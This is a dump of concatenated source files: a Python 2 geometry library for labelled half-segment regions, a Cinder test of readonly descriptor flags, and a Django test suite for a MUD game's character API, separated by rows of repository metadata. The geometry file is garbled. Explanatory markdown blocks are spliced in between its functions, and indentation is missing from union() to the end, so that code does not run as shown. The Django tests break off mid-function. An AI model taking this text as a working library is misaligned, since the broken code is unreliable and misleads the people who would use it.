    hsegs = hsegLibrary.extractAllLargeValidCycles( segs )
    return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
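The docstring above describes half segments as `((x, y), (x, y), labelAbove, labelBelow)` tuples kept in half segment order. A minimal sketch of ordering half segments by their dominating (first) point; note that `hsegLibrary`'s real comparison also breaks ties between collinear dominating points, which this illustration omits:

```python
def dominating_point(hseg):
    # A half segment is ((p1, p2), labelAbove, labelBelow);
    # p1 is the dominating point used for ordering.
    return hseg[0][0]

hsegs = [(((2, 2), (3, 5)), 1, -1), (((0, 0), (2, 2)), 1, -1)]
hsegs.sort(key=dominating_point)
print(dominating_point(hsegs[0]))  # (0, 0)
```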
def getRandomRegion( numRandomSegsToGenerate = 50, percentOfSegsToRemove = .05 ):
    '''
    Generates a region from random segments with floating point endpoints.

    input:
        numRandomSegsToGenerate: the number of random segs to generate.  The actual region
            will have many fewer segs than this.  Higher numbers will typically generate more
            complex regions.  The region is constructed by intersecting the random segs and
            finding a region among the resulting segs.
        percentOfSegsToRemove: once the random segments are generated and intersected such
            that all segments intersect only at endpoints, some segments are removed at
            random.  This parameter is the fraction of the overall segs that will be removed.
            A higher number typically causes regions to have less regular shapes.  Note that
            a high percentage may require a larger number of random segs to be generated.
    returns:
        hsegs: an ordered list of half segments with valid labels.
            A half segment is a tuple of the form ((x,y),(x,y), labelAbove, labelBelow).
            Labels are integral values: an interior label is positive, an exterior label
            is -1.  hsegs is ordered in half segment order, and each cycle in hsegs has
            its own unique label number.
    '''
    if numRandomSegsToGenerate == None:
        numRandomSegsToGenerate = 50
    if percentOfSegsToRemove == None:
        percentOfSegsToRemove = .05
    # generate a bunch of random segs with integer endpoints
    segs = segLibrary.createRandomSegs( numRandomSegsToGenerate )
    # convert the endpoints to floats
    segs = [((float(s[0][0]), float(s[0][1])), (float(s[1][0]), float(s[1][1]))) for s in segs]
    # order each segment so its smaller endpoint comes first
    newSegs = []
    for s in segs:
        if s[0] < s[1]:
            newSegs.append( s )
        else:
            newSegs.append( (s[1], s[0]) )
    segs = newSegs
    # find their intersections
    segs = segLibrary.calcNonIntersectingSegs( segs )
    # randomly remove some of the segs
    segs = segLibrary.removeRandSegs( segs, percentOfSegsToRemove )
    # create a region, favoring cycles that contain many segments
    hsegs = hsegLibrary.extractAllLargeValidCycles( segs )
    return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
def createRegionFromSegs( segs ):
    # Build a labelled region from an arbitrary list of segments.
    if segs == None or len(segs) == 0:
        return []
    # convert endpoints to floats and order each segment so its smaller endpoint comes first
    segs = [((float(s[0][0]), float(s[0][1])), (float(s[1][0]), float(s[1][1]))) for s in segs]
    newSegs = []
    for s in segs:
        if s[0] < s[1]:
            newSegs.append( s )
        else:
            newSegs.append( (s[1], s[0]) )
    segs = newSegs
    segs = segLibrary.calcNonIntersectingSegs( segs )
    hsegs = hsegLibrary.labelUniqueCycles( segs )
    return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
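`createRegionFromSegs` first converts every endpoint to a float and swaps each segment so its lexicographically smaller endpoint comes first. That normalization step on its own can be sketched as:

```python
def normalize_segs(segs):
    # Convert endpoints to floats and store the lexicographically
    # smaller endpoint of each segment first.
    out = []
    for p1, p2 in segs:
        p1 = (float(p1[0]), float(p1[1]))
        p2 = (float(p2[0]), float(p2[1]))
        out.append((p1, p2) if p1 < p2 else (p2, p1))
    return out

print(normalize_segs([((3, 1), (0, 2))]))  # [((0.0, 2.0), (3.0, 1.0))]
```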
def createRegionFavorLargeCyclesFromSegs( segs ):
    # Build a region, favoring cycles that contain many segments.
    if segs == None or len(segs) == 0:
        return []
    newSegs = []
    for s in segs:
        if segLibrary.poiComp( s[0], s[1] ) == 1:
            s = (s[1], s[0])
        if s[0] != s[1]:
            newSegs.append( s )
    segs = newSegs
    segs = segLibrary.calcNonIntersectingSegs( segs )
    return hsegLibrary.extractAllLargeValidCycles( segs )
def getOuterCycle( hsegs ):
    # Return only the outer cycle of the region.
    if hsegs == None or len(hsegs) == 0:
        return []
    return giveUniqueLabelToEachCycle( hsegs, True )
def giveUniqueLabelToEachCycle( hsegs, getOnlyOuterCycle = False ):
    # Relabel the region so that each cycle carries a unique label.
    if hsegs == None or len(hsegs) == 0:
        return []
    segs = [h[0] for h in hsegs if hsegLibrary.isLeft( h )]
    hsegs = hsegLibrary.labelUniqueCycles( segs, getOnlyOuterCycle )
    return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
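`giveUniqueLabelToEachCycle` keeps one copy of each segment by filtering on `hsegLibrary.isLeft`, whose implementation is not shown here. Assuming the usual half-segment convention that the "left" half is the one whose dominating point is the smaller endpoint, the filter can be sketched as follows (a guess at the library's semantics, not its actual code):

```python
def is_left(hseg):
    # Assumed convention: the "left" half segment is the one whose
    # dominating (first) point is the smaller endpoint of the segment.
    (p1, p2), _la, _lb = hseg
    return p1 < p2

hsegs = [(((0, 0), (1, 1)), 1, -1), (((1, 1), (0, 0)), 1, -1)]
print([h[0] for h in hsegs if is_left(h)])  # [((0, 0), (1, 1))]
```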
def createCountPartition( segList, laList, lbList ):
    # Validate that all three parallel lists are present and the same length.
    if segList == None or laList == None or lbList == None \
            or len(segList) == 0 or len(laList) == 0 or len(lbList) == 0 \
            or len(segList) != len(laList) or len(segList) != len(lbList):
        return [], [], []
    sr, la, lb = segLibrary.calcNonIntersectingSegs( segList, laList, lbList )
    # write the intermediate results to a file, one segment per line, with each
    # coordinate packed as a big-endian double and rendered in hex
    outfile = open( 'zcountIntermediateNon_Rob_Check.txt', 'w' )
    for i in range( len( sr ) ):
        seg = sr[i]
        s = struct.pack('>d', seg[0][0])
        hexx1 = ''.join('%.2x' % ord(c) for c in s)  # hex vals from bin string s
        s = struct.pack('>d', seg[0][1])
        hexy1 = ''.join('%.2x' % ord(c) for c in s)
        s = struct.pack('>d', seg[1][0])
        hexx2 = ''.join('%.2x' % ord(c) for c in s)
        s = struct.pack('>d', seg[1][1])
        hexy2 = ''.join('%.2x' % ord(c) for c in s)
        # output the line to the new file
        outfile.write( hexx1 + ' ' + hexy1 + ' ' + hexx2 + ' ' + hexy2 + ' ' + str(la[i]) + ' ' + str(lb[i]) + '\n')
    outfile.close()
    print zip( sr, la, lb )
    print 'done intersections'
    s, la, lb = segLibrary.countInteriors( sr, la, lb )
    return s, la, lb
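`createCountPartition` serializes each coordinate as a big-endian IEEE-754 double rendered in hex, built in Python 2 by joining `'%.2x' % ord(c)` over the packed string. The same encoding, written so it also works on Python 3:

```python
import binascii
import struct

def double_to_hex(value):
    # Pack as a big-endian IEEE-754 double and render the 8 bytes as hex.
    return binascii.hexlify(struct.pack('>d', value)).decode('ascii')

print(double_to_hex(1.0))  # 3ff0000000000000
```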
def union( hsegs1, hsegs2 ):
''' Assumes that hsegs1 and hsegs2 are valid regions, created with createRegionFromSegs.
Regions are assumed to have valid labelling. This function will relabel them to compute the union
'''
if hsegs1 is None:
hsegs1 = list()
if hsegs2 is None:
hsegs2 = list()
if len( hsegs1 ) == 0:
return hsegs2
if len( hsegs2 ) == 0:
return hsegs1
if len(hsegs1) == 0 and len( hsegs2) == 0:
return []
# get the segs
segs1 = [ h[0] for h in hsegs1 if hsegLibrary.isLeft( h ) ]
segs2 = [ h[0] for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# get the bboxs
s1maxx = max( [x[0] for y in segs1 for x in y] )
s1minx = min( [x[0] for y in segs1 for x in y] )
s1maxy = max( [x[1] for y in segs1 for x in y] )
s1miny = min( [x[1] for y in segs1 for x in y] )
s2maxx = max( [x[0] for y in segs2 for x in y] )
s2minx = min( [x[0] for y in segs2 for x in y] )
s2maxy = max( [x[1] for y in segs2 for x in y] )
s2miny = min( [x[1] for y in segs2 for x in y] )
# check for overlap in x AND y direction
if not( (s1maxx >= s2maxx and s1minx >= s2maxx) or ( s1maxx <= s2minx and s1minx <= s2minx) or (s1maxy >= s2maxy and s1miny >= s2maxy) or ( s1maxy <= s2miny and s1miny <= s2miny)):
# get the broken segs
resultSegs1, resultSegs2 = segLibrary.segIntersection( segs1, segs2 )
# get the regions
hsegs1 = hsegLibrary.labelUniqueCycles( resultSegs1 )
hsegs1 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs1 )
hsegs2 = hsegLibrary.labelUniqueCycles( resultSegs2 )
hsegs2 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs2 )
# keep just the left hsegs
hsegs1 = [h for h in hsegs1 if hsegLibrary.isLeft( h ) ]
hsegs2 = [h for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# union will keep all hsegs out of the other or on with matching interabove
s1, la1, lb1 = [ list(z) for z in zip(* hsegs1 )]
s2, la2, lb2 = [ list(z) for z in zip(* hsegs2 )]
# keep the ones out of the opposing region
resultSet = set()
resultSet |= segLibrary.keepOuterBoundary( s1, la1, lb1, s2, la2, lb2 )
resultSet |= segLibrary.keepOuterBoundary( s2, la2, lb2, s1, la1, lb1 )
# make a region out of it
resultList = list( resultSet )
hsegs = hsegLibrary.labelUniqueCycles( resultList )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
else:
resultList = list()
for s in segs1:
resultList.append( s )
for s in segs2:
resultList.append( s )
resultSet = set( resultList )
resultList = list( resultSet )
# create the region (this code is copied from createRegionFromSegs, minus the seg intersection call)
hsegs = hsegLibrary.labelUniqueCycles( resultList )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
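The bounding-box rejection test used above can be expressed as a standalone predicate. This is a hedged reconstruction (the (minx, miny, maxx, maxy) tuple layout is an assumption for illustration): two boxes overlap unless one lies entirely to one side of the other.

```python
def bboxes_overlap(b1, b2):
    # each box is (minx, miny, maxx, maxy); boxes overlap unless one
    # lies entirely to the left/right of, or entirely above/below, the other
    return not (b1[2] < b2[0] or b2[2] < b1[0] or
                b1[3] < b2[1] or b2[3] < b1[1])
```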
def difference( hsegs1, hsegs2 ):
''' NON-symmetric difference. for R1 and R2,
defined as R1 - (R1 \cap R2).
Regions are assumed to have valid labelling.
This function will return a properly labelled region
'''
if hsegs1 is None or len(hsegs1) == 0:
return []
if hsegs2 is None or len(hsegs2) == 0:
return hsegs1
# get the segs
segs1 = [ h[0] for h in hsegs1 if hsegLibrary.isLeft( h ) ]
segs2 = [ h[0] for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# get the bboxs
s1maxx = max( [x[0] for y in segs1 for x in y] )
s1minx = min( [x[0] for y in segs1 for x in y] )
s1maxy = max( [x[1] for y in segs1 for x in y] )
s1miny = min( [x[1] for y in segs1 for x in y] )
s2maxx = max( [x[0] for y in segs2 for x in y] )
s2minx = min( [x[0] for y in segs2 for x in y] )
s2maxy = max( [x[1] for y in segs2 for x in y] )
s2miny = min( [x[1] for y in segs2 for x in y] )
# check for overlap in x AND y direction
if not( (s1maxx >= s2maxx and s1minx >= s2maxx) or ( s1maxx <= s2minx and s1minx <= s2minx) or (s1maxy >= s2maxy and s1miny >= s2maxy) or ( s1maxy <= s2miny and s1miny <= s2miny)):
# get the intersection
hsegsInter = intersection( hsegs1, hsegs2 )
if len( hsegsInter ) == 0:
return hsegs1
# now do the difference
# get the segs
segs1 = [ h[0] for h in hsegs1 if hsegLibrary.isLeft( h ) ]
segs2 = [ h[0] for h in hsegsInter if hsegLibrary.isLeft( h ) ]
# get the broken segs
resultSegs1, resultSegs2 = segLibrary.segIntersection( segs1, segs2 )
# get the regions
hsegs1 = hsegLibrary.labelUniqueCycles( resultSegs1 )
hsegs1 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs1 )
hsegs2 = hsegLibrary.labelUniqueCycles( resultSegs2 )
hsegs2 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs2 )
# keep just the left hsegs
hsegs1 = [h for h in hsegs1 if hsegLibrary.isLeft( h ) ]
hsegs2 = [h for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# unzip the hsegs into parallel seg and label lists
s1, la1, lb1 = [ list(z) for z in zip(* hsegs1 )]
s2, la2, lb2 = [ list(z) for z in zip(* hsegs2 )]
# keep the ones out of the opposing region
resultSet = set()
resultSet |= segLibrary.keepOuterBoundary( s1, la1, lb1, s2, la2, lb2, False )
resultSet |= segLibrary.keepInnerBoundary( s2, la2, lb2, s1, la1, lb1, False )
# make a region out of it
resultList = list( resultSet )
hsegs = hsegLibrary.labelUniqueCycles( resultList )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
else:
return hsegs1
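The docstring defines the non-symmetric difference as R1 - (R1 ∩ R2), which for point sets is the same as ordinary set difference. A quick sanity check of that identity with plain Python sets:

```python
r1 = {1, 2, 3}
r2 = {2, 3, 4}
# the non-symmetric difference defined in the docstring equals ordinary set difference
assert r1 - (r1 & r2) == r1 - r2 == {1}
```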
def intersection( hsegs1, hsegs2 ):
''' Assumes that hsegs1 and hsegs2 are valid regions, created with createRegionFromSegs.
Regions are assumed to have valid labelling. This function will relabel them to compute the intersection
'''
# check for empty input
if hsegs2 is None or len(hsegs2) == 0:
return list()
if hsegs1 is None or len(hsegs1) == 0:
return list()
# get the segs
segs1 = [ h[0] for h in hsegs1 if hsegLibrary.isLeft( h ) ]
segs2 = [ h[0] for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# get the bboxs
s1maxx = max( [x[0] for y in segs1 for x in y] )
s1minx = min( [x[0] for y in segs1 for x in y] )
s1maxy = max( [x[1] for y in segs1 for x in y] )
s1miny = min( [x[1] for y in segs1 for x in y] )
s2maxx = max( [x[0] for y in segs2 for x in y] )
s2minx = min( [x[0] for y in segs2 for x in y] )
s2maxy = max( [x[1] for y in segs2 for x in y] )
s2miny = min( [x[1] for y in segs2 for x in y] )
# check for overlap in x AND y direction
if (s1maxx >= s2maxx and s1minx >= s2maxx) or ( s1maxx <= s2minx and s1minx <= s2minx) or (s1maxy >= s2maxy and s1miny >= s2maxy) or ( s1maxy <= s2miny and s1miny <= s2miny):
return list()
# get the broken segs
resultSegs1, resultSegs2 = segLibrary.segIntersection( segs1, segs2 )
# get the regions
hsegs1 = hsegLibrary.labelUniqueCycles( resultSegs1 )
hsegs1 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs1 )
hsegs2 = hsegLibrary.labelUniqueCycles( resultSegs2 )
hsegs2 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs2 )
# keep just the left hsegs
hsegs1 = [h for h in hsegs1 if hsegLibrary.isLeft( h ) ]
hsegs2 = [h for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# unzip the hsegs into parallel seg and label lists
s1, la1, lb1 = [ list(z) for z in zip(* hsegs1 )]
s2, la2, lb2 = [ list(z) for z in zip(* hsegs2 )]
# keep the ones out of the opposing region
resultSet = set()
resultSet |= segLibrary.keepInnerBoundary( s1, la1, lb1, s2, la2, lb2 )
resultSet |= segLibrary.keepInnerBoundary( s2, la2, lb2, s1, la1, lb1 )
# make a region out of it
resultList = list( resultSet )
hsegs = hsegLibrary.labelUniqueCycles( resultList )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
def writeRegionToFile( theRegion, theFileName ):
theFileObject = open( theFileName, 'w')
for h in theRegion:
if hsegLibrary.isLeft( h ) or h[0][0] == h[0][1]:
s1 = str( h[0][0][0])+' '+str(h[0][0][1])+' '+str( h[0][1][0])+' '+str(h[0][1][1])+' '+ str(h[1])+' '+ str(h[2]) +' ' + '\n'
theFileObject.write( s1 )
theFileObject.close()
def writeRegionToHexFile( theRegion, theFileName ):
theFileObject = open( theFileName, 'w')
for h in theRegion:
if hsegLibrary.isLeft( h ) or h[0][0] == h[0][1]:
x1 = struct.pack('>d', h[0][0][0])
hexx1 = ''.join('%.2x' % ord(c) for c in x1)
y1 = struct.pack('>d', h[0][0][1])
hexy1 = ''.join('%.2x' % ord(c) for c in y1)
x2 = struct.pack('>d', h[0][1][0])
hexx2 = ''.join('%.2x' % ord(c) for c in x2)
y2 = struct.pack('>d', h[0][1][1])
hexy2 = ''.join('%.2x' % ord(c) for c in y2)
s1 = hexx1 + ' ' + hexy1 + ' ' + hexx2 + ' ' + hexy2 + ' ' + str(h[1]) + ' ' + str(h[2]) + ' ' + '\n'
theFileObject.write( s1 )
theFileObject.close()
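writeRegionToHexFile stores each coordinate as the hex string of a big-endian packed double. On Python 3 the same encoding, plus the inverse decoding that the library above does not show, can be sketched like this (function names are illustrative, not from the library):

```python
import struct

def double_to_hex(value):
    # pack as an 8-byte big-endian IEEE-754 double, then hex-encode the bytes
    return struct.pack('>d', value).hex()

def hex_to_double(hexstr):
    # inverse: decode the hex back into bytes and unpack the double
    return struct.unpack('>d', bytes.fromhex(hexstr))[0]
```

This round-trips exactly, since the hex string preserves every bit of the double.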
| 42.019178 | 223 | 0.682989 | 2,204 | 15,337 | 4.751815 | 0.128857 | 0.009166 | 0.01375 | 0.016041 | 0.823546 | 0.807887 | 0.782679 | 0.782679 | 0.760623 | 0.736274 | 0 | 0.035923 | 0.20682 | 15,337 | 364 | 224 | 42.134615 | 0.82499 | 0.105366 | 0 | 0.651982 | 1 | 0 | 0.011956 | 0.003295 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.013216 | null | null | 0.008811 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
93720a28d09163970f141c5e450e582ffd8f1ae9 | 3,322 | py | Python | Lib/test/test_compiler/test_readonly/test_attr_access.py | itamaro/cinder | a08198c185a255b59f85dc84183558370a0c5284 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/test/test_compiler/test_readonly/test_attr_access.py | itamaro/cinder | a08198c185a255b59f85dc84183558370a0c5284 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/test/test_compiler/test_readonly/test_attr_access.py | itamaro/cinder | a08198c185a255b59f85dc84183558370a0c5284 | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | import unittest
from .common import ReadonlyTestBase
class AttrAccessTests(ReadonlyTestBase):
def test_readonly_flags0(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls: Readonly[object], t):
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 0)
def test_readonly_flags1(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls, t):
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 1)
def test_readonly_flags2(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls: Readonly[object], t) -> Readonly[object]:
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 2)
def test_readonly_flags3(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls, t) -> Readonly[object]:
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 3)
def test_readonly_flags_no_readonly(self) -> None:
code = """
class Descr:
def __get__(self, cls, t):
pass
class NewClass:
a = Descr()
def f():
return NewClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 1)
def test_readonly_flags_inheritance(self) -> None:
code = """
class Descr:
@readonly_func
def __get__(self, cls, t):
pass
class NewClass:
a = Descr()
class DerivedClass(NewClass):
pass
def f():
return DerivedClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 1)
def test_readonly_flags_multiple_inheritance(self) -> None:
code = """
class Descr1:
@readonly_func
def __get__(self, cls, t):
pass
class NewClass1:
a = Descr1()
class Descr2:
@readonly_func
def __get__(self, cls: Readonly[object], t) -> Readonly[object]:
pass
class NewClass2:
a = Descr2()
class DerivedClass(NewClass1, NewClass2):
pass
def f():
return DerivedClass.__flags__
"""
result = self._compile_and_run(code, "f")
self.assertEqual(result & 0x3, 3)
def _compile_and_run(self, code: str, func: str) -> int:
f = self.compile_and_run(code)[func]
return f()
| 23.394366 | 76 | 0.509031 | 332 | 3,322 | 4.756024 | 0.144578 | 0.056998 | 0.074098 | 0.065864 | 0.782141 | 0.730209 | 0.730209 | 0.730209 | 0.730209 | 0.708043 | 0 | 0.016312 | 0.39103 | 3,322 | 141 | 77 | 23.560284 | 0.764212 | 0 | 0 | 0.764151 | 0 | 0 | 0.58519 | 0.027092 | 0 | 0 | 0.006321 | 0 | 0.066038 | 1 | 0.075472 | false | 0.09434 | 0.018868 | 0 | 0.179245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
faa7bcad82cabd67bccd12c2874b28c1353ad264 | 45,701 | py | Python | lively-lions/MUD/dungeon/test/view/test_character.py | whywhyy/summer-code-jam-2020 | 9d46c6a9e6ccfae1b9ab5db1b6bf2a6b0abe4c10 | [
"MIT"
] | 2 | 2020-08-03T09:38:05.000Z | 2020-08-04T03:52:26.000Z | lively-lions/MUD/dungeon/test/view/test_character.py | whywhyy/summer-code-jam-2020 | 9d46c6a9e6ccfae1b9ab5db1b6bf2a6b0abe4c10 | [
"MIT"
] | null | null | null | lively-lions/MUD/dungeon/test/view/test_character.py | whywhyy/summer-code-jam-2020 | 9d46c6a9e6ccfae1b9ab5db1b6bf2a6b0abe4c10 | [
"MIT"
] | null | null | null | # from django.contrib.auth.models import User
# from django.test import TestCase
from django.test import Client
# from django.urls import reverse
import pytest
# from mixer.backend.django import mixer
from .test_base import BaseTestCase
from dungeon.models.character import MudUser, Character
@pytest.mark.django_db
class CharacterTestCase(BaseTestCase):
def test_base_create_user_and_login(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
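Every test in this class rebuilds the same insert_data dictionaries by hand. A hedged refactor (helper name assumed, not in the original file) could build the payload once per call:

```python
def payload(view_name, **extra):
    # hypothetical builder for the repeated insert_data dicts used by these tests
    data = {'view_name': view_name}
    data.update(extra)
    return data
```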
def test_and_create_character(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
def test_and_create_two_samename_character(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create samename character
insert_data = {'view_name': 'create_character', 'name': 'hello_name'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'invalid'.encode(), 'Should be same'
def test_and_create_character_get_character_list(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# get character
insert_data = {'view_name': 'get_character_list'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name'.encode(), 'Should be same'
def test_and_not_character_get_character_list(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# get character
insert_data = {'view_name': 'get_character_list'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'invalid'.encode(), 'Should be same'
def test_and_create_two_character_get_character_list(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# get character
insert_data = {'view_name': 'get_character_list'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name02'.encode(), 'Should be same'
def test_and_create_character_and_get_character_stats(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# get character stats
insert_data = {'view_name': 'get_character_stats', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == \
'hello_name01 hp : 100/100 total attack : 11 attack cool time : 3.0 total defense : 11'.encode(), \
'Should be same'
def test_and_create_character_and_update_character_stats_and_get_stats(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
client = Client()
